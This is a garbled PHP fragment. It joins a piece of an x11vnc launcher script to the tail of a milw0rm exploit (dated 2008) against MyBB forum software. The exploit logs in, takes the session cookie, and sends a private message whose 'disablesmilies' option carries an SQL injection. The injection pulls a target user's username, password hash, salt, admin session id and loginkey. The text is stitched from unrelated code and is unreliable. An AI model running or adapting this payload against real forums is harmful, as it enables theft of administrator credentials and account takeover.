function out($s) { global $download; if ($download) { return; } print $s; myflush(); }
// )); // $theurl=hhb_tohtml($theurl); // $newstatus.='<a href="'.$theurl.'">'.$theurl.'</a><br/>'; // updateStatusHTML($newstatus); } myflush(); } if ($stderrlen > 0) { echo 'stderr: <span style="background-color:#' . substr(md5($stderr), 0, 6) . ';">' . hhb_tohtml(return_var_dump($stderr)) . '</span>' . PHP_EOL; myflush(); } if ($status['running'] === false) { echo "x11vnc has stopped."; echo 'status: ' . hhb_tohtml(return_var_dump($status)) . PHP_EOL; echo '</pre>'; myflush(); fclose($pipes[1]); fclose($pipes[2]); break; } sleep(5); continue; } die('finished'); function generateRandomVNCPassword($length = 8, $charlist = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') { // echo base_convert(bin2hex(openssl_random_pseudo_bytes(16, $strong)), 16, // 36);//viper7 $listlen = strlen($charlist); $ret = ''; for ($i = 0; $i < $length; ++$i) {
$get_cookie = sendd($host_mybb, $patch_mybb, $login_mybb, 'POST', $data_login, 'fuckkk'); echo '<pre>- login ' . $username . ' with passwd = ' . $pwd . ' done'; myflush(50000); foreach ($get_cookie as $value) { if (strpos($value, 'Set-Cookie: mybbuser='******'mybbuser'); break; } } echo '<pre>- cookie: ' . $cookie; myflush(50000); preg_match("/mybbuser=(.*)_/", $cookie, $m); $get_uid = $m[1]; echo '<pre>- user id: ' . $get_uid; myflush(50000); $data_expl = "to={$username}&message=co6ako_ykycuJIo&options[disablesmilies]=',null,null),({$get_uid},{$get_uid},{$get_uid},1,'with+<3+from+antichat.ru',9,concat_ws(0x3a,'username:password:salt+>',(select+username+from+mybb_users+where+uid={$uid_needed}),(select+password+from+mybb_users+where+uid={$uid_needed}),(select+salt+from+mybb_users+where+uid={$uid_needed}),' admin sid',(select+sid+from+mybb_adminsessions+where+uid={$uid_needed}),' admin loginkey',(select+loginkey+from+mybb_adminsessions+where+uid={$uid_needed})),1121512515,null,null,'yes',null,null)/*&action=do_send"; sendd($host_mybb, $patch_mybb, $pm_mybb, 'POST', $data_expl, $cookie); echo '<pre>- send exploit: ------------------- ' . $send_http . ' ------------------- look you private messages 4 admin passwd hash <a href=http://' . $host_mybb . '/' . $patch_mybb . '/' . $pm_mybb . ' target=_blank>http://' . $host_mybb . '/' . $patch_mybb . '/' . $pm_mybb . '</a>'; } ?> </body> </html> # milw0rm.com [2008-08-26]